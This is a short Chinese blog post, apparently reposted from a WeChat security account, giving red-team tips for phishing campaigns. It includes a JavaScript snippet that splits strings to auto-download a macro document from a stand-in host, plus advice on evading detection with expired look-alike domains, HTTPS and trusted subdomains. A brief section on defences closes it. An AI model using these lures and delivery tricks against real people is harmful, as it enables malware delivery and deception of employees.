提升钓鱼成功率看这七点建议

  • A+
所属分类:安全闲碎

在红蓝对抗当中,钓鱼攻击被越来越多的红队使用,因为员工的安全意识薄弱,导致钓鱼成功的可能性很大,因为钓鱼事件导致内网被入侵的事件比比皆是,作为红队的一员做钓鱼测试的时候,如何提升钓鱼成功率,可以看看以下七点建议。

1、不直接将 payload 放置邮件内容

可以将 payload 放在自己的服务器上,通过访问服务器的方式加载 payload 

使用的钓鱼 url 最好做一下 url 重写,例如使用: 

https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/)

而不是: 

https://phishy.domain/company/index.php

可以用下面的方式配置 apache 的 url 重写: 

RewriteEngine OnRewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule ^(.*)$ index.php [L,QSA]

2、不直接在邮件内容中添加恶意附件

可以通过嵌入 html、js 等方式进行恶意文件加载,html 方式如:

<a href="https://phishy.domain/payload.docm">download the code of conduct</a>

javascript 的方式如:

<a id="download" href="#">download the code of conduct</a><script>document.getElementById("download").onclick = function() {document.location = "https://phish" + "y.domain/pay" + "load.docm"; };document.getElementById("download").click();</script>

3、钓鱼域名使用过期域名

申请的域名最怕的是已经被安全产品标记为恶意,所以在申请域名的时候,可以去找一些刚过期的域名,为了迷惑对手,可以尝试根据关键词来搜索过期域名,然后进行注册,提升钓鱼的成功率,下面的网站是可以查询过期域名的:

https://www.expireddomains.net/backorder-expired-domains/

如下工具可以直接输入关键词就可以获得一些相似的过期域名信息,项目地址:

https://github.com/Mr-Un1k0d3r/CatMyPhish

4、搭建钓鱼网站尽量使用 https

因为浏览器会将使用 http 的网站标记为不安全,我们可以申请一些免费的 https 证书,给自己的钓鱼网站添加正常的证书,更具有迷惑性。

5、钓鱼内容尽量无趣

在企业内部经常会收到一些规章制度的邮件、或者内部发布的一些无聊且需要执行的邮件内容,大家在看到邮件内容的时候,不会过多的关注,可能默默的就完成了提示的操作,这样可以减少大家互相讨论导致的钓鱼行为被暴露的风险。

6、尽可能使用第三方的子域名

如果有正常网站的子域名可以用,尽量使用,因为这类域名通常不会被安全软件标记为恶意域名,在大众的心理也会比较信任,比如那些提供二级或者三级域名使用的云服务。

7、每次使用的域名尽量不复用

在被安全公司分析出域名存在恶意行为之后,会被标记并加入威胁情报当中,如果复用该域名,很有可能被安全软件命中威胁情报,从而提前暴露钓鱼行为,导致钓鱼测试失败。

总结

以上是作为攻击方需要注意的几点,而作为防守方,需要做的事情更多,比如提升全民安全意识、邮件安全网关、网络层入侵检测、主机层入侵检测、终端安全等,每个环节都需要进行重点防御。

对于员工安全意识提升方面,以攻促防,通过多次实际的钓鱼模拟测试来提升员工对钓鱼邮件的免疫能力,这是一个艰难而又漫长的过程。

提升钓鱼成功率看这七点建议

本文始发于微信公众号(信安之路):提升钓鱼成功率看这七点建议

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: